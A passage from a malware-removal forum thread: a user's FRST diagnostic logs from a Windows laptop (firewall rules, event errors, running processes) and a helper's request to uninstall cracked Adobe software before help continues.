HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Python39\Scripts\;C:\Python39\;C:\Program Files (x86)\Common Files\Intel\Shared Libraries\redist\intel64\compiler;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\MATLAB\R2019b\bin;C:\ProgramData\chocolatey\bin;C:\Program Files (x86)\FontForgeBuilds\bin;C:\Program Files\nodejs\ HKCU\Environment\\Path -> ;C:\Users\FRANCIS\AppData\Local\Programs\Microsoft VS Code\bin;C:\Users\FRANCIS\AppData\Roaming\npm HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper HKU\S-1-5-21-3936790745-3440936247-791344644-1002\Control Panel\Desktop\\Wallpaper -> C:\WINDOWS\web\wallpaper\Windows\img0.jpg DNS Servers: 192.168.15.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn) Windows Firewall is enabled.   ==================== MSCONFIG/TASK MANAGER disabled items ==   (If an entry is included in the fixlist, it will be removed.)   
HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0" HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0" HKLM\...\StartupApproved\Run32: => "TeamsMachineInstaller" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\StartupFolder: => "GenuineService.lnk" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\Run: => "com.squirrel.Teams.Teams" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\Run: => "BitTorrent" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\Run: => "Lync" HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\StartupApproved\Run: => "com.squirrel.Teams.Teams"   ==================== FirewallRules (Whitelisted) ================   (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)   FirewallRules: [UDP Query User{33CC5D8F-A04C-4287-98A2-248BF85E83CA}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File FirewallRules: [TCP Query User{2FDCF539-A9A5-418E-915D-A9F6DE9DB683}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File FirewallRules: [UDP Query User{E9A63349-3DAD-43E9-A0C2-4B2F8C93E608}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File FirewallRules: [TCP Query User{B5DCAAF9-24E1-46F6-99C1-35F496281A4A}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File FirewallRules: [{07BBFCF6-DF65-47F5-85C2-7D1B7C24B1A3}] => (Allow) 
C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{2888FD9A-0240-4993-8574-4D6FE92763C9}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{0456832C-81E2-4CB4-A595-ADAA5BE13C5A}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{C756A12D-A4ED-4DE2-BABB-B63C963899F5}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{55C341D3-D845-4467-B7D4-A1A3C9365514}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{92E821F5-0067-4BE8-87DC-FF54D1DDAF46}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{AA11FF77-EA4F-41ED-8B5D-3EE615A05069}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.) FirewallRules: [{E5F8868D-3083-4DA4-9765-2120F6BF9795}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\Zoom\bin\airhost.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.) FirewallRules: [{0BA8BD44-83D9-40E6-A999-E4D37858CBB0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe => No File FirewallRules: [{717921BB-9091-4EED-A4CD-7505A7ED940F}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe => No File FirewallRules: [TCP Query User{C2385DA0-E699-4532-9801-1101007A4A24}C:\program files\the sims 4\game\bin\ts4_x64.exe] => (Allow) C:\program files\the sims 4\game\bin\ts4_x64.exe (Electronic Arts Inc.) [File not signed] FirewallRules: [UDP Query User{9BE27131-2F41-4793-B132-6CA531C80BFA}C:\program files\the sims 4\game\bin\ts4_x64.exe] => (Allow) C:\program files\the sims 4\game\bin\ts4_x64.exe (Electronic Arts Inc.) 
[File not signed] FirewallRules: [TCP Query User{7E8B4214-F799-4C32-B0FA-0C501D6B769F}C:\users\francis\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\francis\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [UDP Query User{620EE8CA-B37A-4A2B-960E-839973E37DCA}C:\users\francis\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\francis\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{1B5FFB87-BD24-4AAB-8232-877F7C32E185}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{6EB62FA3-39D4-4B05-A11B-582C247C8AFE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{D46C3A74-A2FD-4549-8A91-5A292FD373D7}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{1A279772-FE45-4B7F-98BC-83D4DC4D3B1F}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{65533106-6D9B-4ED1-A603-23424A01100A}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{2E7F0967-8379-4D15-A8F7-A0C70358B61D}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) 
FirewallRules: [TCP Query User{62309B5E-7E93-452D-85D7-5ECA8B8D2138}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [UDP Query User{C53D51E0-69B0-447A-9628-66CDE2C11DD7}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [TCP Query User{1DC8F033-ACD2-43D0-810E-40C8034169CB}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [UDP Query User{0E7FB93C-3FCF-492C-8942-5F9902E6AF3D}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{49F5DBB5-AFEA-4EA5-925F-7B913B073C46}] => (Allow) C:\Program Files\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe (Maxis, a division of Electronic Arts Inc.) [File not signed] FirewallRules: [{A7C37344-5433-47B3-9391-0549424B09C3}] => (Allow) C:\Program Files\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe (Maxis, a division of Electronic Arts Inc.) 
[File not signed] FirewallRules: [{F97B6736-0B66-4DD1-9300-900E438ADC1D}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe (Lenovo -> ) FirewallRules: [{1595DAE1-94A1-4BEE-8C9A-8A2A87AD69FA}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe (Lenovo -> ) FirewallRules: [{B1443A2D-C10F-4D7B-B0E5-D23CE1F9FCD3}] => (Block) C:\Program Files\EaseUS\EaseUS Data Recovery Wizard\DRW.exe => No File FirewallRules: [{CE7DA8F3-C864-4218-8034-F5E810694A18}] => (Block) C:\Program Files\EaseUS\EaseUS Data Recovery Wizard\DRWUI.exe => No File FirewallRules: [{E525347A-A948-4513-9338-37E34903389E}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{53DA5FCB-03B1-47B3-8F3F-1C013CF5B3FB}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{CD74709F-9987-4A09-A025-6E452B134692}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{72085FAE-6A37-4774-ABCF-028B74723DC4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{B1A406EC-89D8-405E-8973-45A8BD00BCC0}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{A96D2325-0844-4943-9D87-D23DAC9F6AC7}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{4171C853-6EDB-4B71-B2DF-FFF66E8374C3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{88742A13-B4E2-4613-8E55-3C211095B389}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe (McAfee, LLC -> McAfee, LLC) FirewallRules: 
[{91FB82E9-2BB5-4174-92D6-2C4CE2C0DE26}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe (McAfee, LLC -> McAfee, LLC) FirewallRules: [{09A668FD-A7A6-4801-AB23-266C7E561E6F}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe (McAfee, LLC -> McAfee, LLC) FirewallRules: [{9A9D7F93-D218-463D-9E4C-9702C0D2FE41}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{CDB1353C-D9B2-4804-9C27-DC3587BFF5CE}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)   ==================== Restore Points =========================   05-05-2021 11:36:48 Scheduled Checkpoint 06-05-2021 09:53:15 Windows Modules Installer 06-05-2021 10:20:21 Windows Modules Installer   ==================== Faulty Device Manager Devices ============     ==================== Event log errors: ========================   Application errors: ================== Error: (05/06/2021 02:59:50 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Microsoft.Photos.exe version 2020.20120.4004.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.   Process ID: 1784   Start Time: 01d7424531db65b3   Termination Time: 4294967295   Application Path: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe   Report Id: 6fa2ff16-ef10-4395-8bcc-aab6ec1bd2fb   Faulting package full name: Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe   Faulting package-relative application ID: App   Hang type: Activation   Error: (05/04/2021 08:47:57 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine QueryFullProcessImageNameW.  
hr = 0x80070006, The handle is invalid. .     Operation:    Executing Asynchronous Operation   Context:    Current State: DoSnapshotSet   Error: (05/04/2021 06:10:10 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Launch.exe version 18.11.154.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.   Process ID: 1194   Start Time: 01d740ccf4ff8045   Termination Time: 4294967295   Application Path: C:\Program Files\McAfee\CoreUI\Launch.exe   Report Id: 35ebc678-069c-40ac-b971-731f75b6a443   Faulting package full name:    Faulting package-relative application ID:    Hang type: Top level window is idle   Error: (05/04/2021 03:15:28 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program LockApp.exe version 10.0.19041.844 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.   Process ID: 3194   Start Time: 01d740b4590f7113   Termination Time: 4294967295   Application Path: C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe   Report Id: 4be4fb5e-765c-4158-bed0-36c963af4ca4   Faulting package full name: Microsoft.LockApp_10.0.19041.423_neutral__cw5n1h2txyewy   Faulting package-relative application ID: WindowsDefaultLockScreen   Hang type: Quiesce   Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000003fc,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,000000A037CFED20.72).  hr = 0x80070005, Access is denied. .   
Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000288,SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer,0,REG_BINARY,000000A0380FF280.72).  hr = 0x80070005, Access is denied. .     Operation:    BackupShutdown Event   Context:    Execution Context: Writer    Writer Class Id: {542da469-d3e1-473c-9f4f-7847f01fc64f}    Writer Name: COM+ REGDB Writer    Writer Instance ID: {e7e2a211-c1b2-447a-86e8-0f1a13d9d43d}   Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000280,(null),0,REG_BINARY,0000002CF238D800.72).  hr = 0x80070005, Access is denied. .     Operation:    BackupShutdown Event   Context:    Execution Context: Writer    Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}    Writer Name: WMI Writer    Writer Instance ID: {8d07eb09-1827-4d85-ab69-35736fff7086}   Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000288,SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer,0,REG_BINARY,000000A0380FF290.72).  hr = 0x80070005, Access is denied. .     Operation:    BackupShutdown Event   Context:    Execution Context: Writer    Writer Class Id: {542da469-d3e1-473c-9f4f-7847f01fc64f}    Writer Name: COM+ REGDB Writer    Writer Instance ID: {e7e2a211-c1b2-447a-86e8-0f1a13d9d43d}     System errors: ============= Error: (05/06/2021 03:15:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The Malwarebytes Service service failed to start due to the following error:  Windows cannot verify the digital signature for this file. 
A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.   Error: (05/06/2021 02:54:53 PM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Update Orchestrator Service service hung on starting.   Error: (05/06/2021 02:51:46 PM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Downloaded Maps Manager service hung on starting.   Error: (05/06/2021 02:49:28 PM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Delivery Optimization service hung on starting.   Error: (05/06/2021 02:47:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The Windows Presentation Foundation Font Cache 3.0.0.0 service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.   Error: (05/06/2021 02:47:23 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Presentation Foundation Font Cache 3.0.0.0 service to connect.   Error: (05/06/2021 02:47:17 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The System Interface Foundation Service service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.   Error: (05/06/2021 02:47:17 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (30000 milliseconds) while waiting for the System Interface Foundation Service service to connect.     Windows Defender: ================ Date: 2021-04-28 09:47:58 Description:  Microsoft Defender Antivirus scan has been stopped before completion. 
Scan Type: Antimalware Scan Parameters: Quick Scan   Date: 2021-04-25 11:06:26 Description:  Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Custom Scan   Date: 2021-04-24 13:21:56 Description:  Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Quick Scan   Date: 2021-04-23 11:40:41 Description:  Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Full Scan   Date: 2021-04-23 11:30:45 Description:  Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Quick Scan   Date: 2021-05-06 08:48:28 Description:  Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version:  Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Update Server Security intelligence Type: AntiVirus Update Type: Full Current Engine Version:  Previous Engine Version: 1.1.18000.5 Error code: 0x80070102 Error description: The wait operation timed out.    Date: 2021-05-06 08:48:28 Description:  Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version:  Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Update Server Security intelligence Type: AntiVirus Update Type: Full Current Engine Version:  Previous Engine Version: 1.1.18000.5 Error code: 0x80070102 Error description: The wait operation timed out.    Date: 2021-04-28 10:07:42 Description:  Microsoft Defender Antivirus has encountered an error trying to update security intelligence. 
New security intelligence Version:  Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Malware Protection Center Security intelligence Type: AntiVirus Update Type: Full Current Engine Version:  Previous Engine Version: 1.1.18000.5 Error code: 0x80072ee2 Error description: The operation timed out    Date: 2021-04-28 10:07:42 Description:  Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version:  Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Malware Protection Center Security intelligence Type: AntiSpyware Update Type: Full Current Engine Version:  Previous Engine Version: 1.1.18000.5 Error code: 0x80072ee2 Error description: The operation timed out    Date: 2021-04-28 10:07:42 Description:  Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version:  Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Malware Protection Center Security intelligence Type: AntiVirus Update Type: Full Current Engine Version:  Previous Engine Version: 1.1.18000.5 Error code: 0x80072ee2 Error description: The operation timed out    CodeIntegrity: =============== Date: 2021-05-06 15:15:01 Description:  Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\services.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe that did not meet the Custom 3 / Antimalware signing level requirements.   Date: 2021-05-06 15:12:52 Description:  Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.   
Date: 2021-05-06 15:01:13 Description:  Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe) attempted to load \Device\HarddiskVolume3\Program Files\McAfee\MfeAV\AMSIExt_x86.dll that did not meet the Microsoft signing level requirements.   Date: 2021-05-06 14:56:51 Description:  Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume3\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Microsoft signing level requirements.     ==================== Memory info ===========================    BIOS: LENOVO 3JCN31WW 07/17/2018 Motherboard: LENOVO Torronto 4C2 Processor: Intel® Core™ i5-7200U CPU @ 2.50GHz Percentage of memory in use: 75% Total physical RAM: 6044.22 MB Available physical RAM: 1493.79 MB Total Virtual: 8860.22 MB Available Virtual: 3824.48 MB   ==================== Drives ================================   Drive c: (Windows) (Fixed) (Total:890.12 GB) (Free:148.74 GB) NTFS Drive d: (LENOVO) (Fixed) (Total:25 GB) (Free:16.12 GB) NTFS   \\?\Volume{7b078799-1b7a-482a-b117-b30df98f6356}\ (WINRE_DRV) (Fixed) (Total:0.98 GB) (Free:0.48 GB) NTFS \\?\Volume{e8a927c2-8256-4564-bc60-9955bd9de628}\ (LENOVO_PART) (Fixed) (Total:14.17 GB) (Free:1.55 GB) NTFS \\?\Volume{3d83052a-24c6-47f1-b841-9e158ac65522}\ (SYSTEM_DRV) (Fixed) (Total:0.25 GB) (Free:0.22 GB) FAT32   ==================== MBR & Partition Table ====================   ========================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: E59E8286)   Partition: GPT.   ==================== End of Addition.txt =======================

#6 Oh My!

    Adware and Spyware and Malware

  • Malware Response Instructor
  • 61,636 posts
  • Gender:Male
  • Location:California

Posted 06 May 2021 - 08:14 PM

Greetings. Thank you for the report. Unfortunately, there is evidence of potentially illegal software on your computer. I am going to request you completely uninstall Adobe Master Collection software and all other products for which you do not have a valid Product Key, including all "cracked" software. If you are willing to do that, please rerun a FRST scan after removal and copy/paste both reports in your reply. If you prefer to leave the program(s) on your computer, let me know that and I will be closing the Topic.

Lord, to whom shall we go? You have the words of eternal life and we have believed and have come to know that you are the Holy One of God. John 6:68-69
The Man on the Middle Cross Said I Could Come

#7 Jones2021Riano

  • Topic Starter
  • Members
  • 45 posts

Posted 06 May 2021 - 10:28 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-04-2021 Ran by FRANCIS (administrator) on LAPTOP-LOE6RFKD (LENOVO 80TU) (07-05-2021 10:55:15) Running from C:\Users\FRANCIS\Downloads Loaded Profiles: FRANCIS Platform: Windows 10 Home Single Language Version 20H2 19042.964 (X64) Language: English (United States) Default browser not detected! Boot Mode: Normal   ==================== Processes (Whitelisted) =================   (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)   () [File not signed] C:\Program Files\MATLAB\R2019b\bin\win64\MATLABStartupAccelerator.exe (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe (Conexant Systems, Inc. -> Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe (Conexant Systems, Inc. -> Conexant Systems, Inc) C:\Program Files\CONEXANT\SAII\SmartAudio.exe (Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe (Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Windows\System32\SASrv.exe (Conexant Systems, Inc.) [File not signed] C:\Program Files\CONEXANT\SAII\CxUtilSvc.exe (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) 
C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe
(Fortemedia Inc -> ) C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
(Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxCUIService.exe
(Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxEM.exe
(Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHDCPSvc.exe
(Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHeciSvc.exe
(Intel® Rapid Storage Technology -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iaahcic.inf_amd64_f222132bfa8270de\RstMwService.exe
(Lanzhou Itanium Software Technology Co., Ltd. -> Zbshareware Lab) C:\Program Files (x86)\USB Disk Security\USBGuard.exe
(Lenovo (Beijing) Limited -> Lenovo Group Limited) C:\Users\FRANCIS\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSBUpdater.exe
(Lenovo -> ) C:\Program Files (x86)\Lenovo\System Update\SUService.exe
(Lenovo -> ) C:\Program Files (x86)\Lenovo\System Update\TvsuCommandLauncher.exe <2>
(Lenovo -> ) C:\Program Files (x86)\Lenovo\System Update\UNCServer.exe
(Lenovo -> Lenovo Group Ltd.) C:\ProgramData\Lenovo\ImController\Plugins\LenovoBatteryGaugePackage\x64\BGHelper.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.Device.exe <2>
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost86\Lenovo.Modern.ImController.PluginHost.Device.exe <3>
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe
(McAfee, Inc. -> McAfee LLC.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(McAfee, Inc. -> McAfee, LLC) C:\Windows\System32\mfevtps.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\CSP\4.1.106.0\McCSPServiceHost.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe <3>
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\VSCore_20_12\mcapexe.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MAT\McPvTray.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\uihost.exe
(McAfee, LLC. -> McAfee, LLC.) C:\ProgramData\McAfee\McInstruTrack\McInstruTrack.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\FRANCIS\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dxgiadaptercache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
